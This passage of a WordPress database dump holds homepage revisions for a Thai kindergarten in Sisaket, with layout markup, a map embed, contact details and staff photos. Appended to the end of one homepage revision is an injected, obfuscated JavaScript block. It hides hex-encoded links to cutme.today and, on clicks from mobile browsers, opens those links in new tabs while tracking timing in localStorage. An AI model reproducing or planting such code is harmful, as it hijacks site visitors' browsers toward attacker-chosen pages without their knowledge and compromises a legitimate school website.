/-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 17:26:30','2025-07-15 10:26:30','',19,'http://watprato.ssk.in.th/?p=733',0,'revision','',0),
(736,1,'2025-10-26 16:20:31','2025-10-26 09:20:31','','ผอ.วิชุดา','','inherit','open','closed','','%e0%b8%9c%e0%b8%ad-%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%b2','','','2025-10-26 16:20:31','2025-10-26 09:20:31','',19,'http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา.jpg',0,'attachment','image/jpeg',0),
(738,1,'2025-10-26 16:20:56','2025-10-26 09:20:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:image {\"id\":46,\"sizeSlug\":\"full\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" class=\"wp-image-46\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" 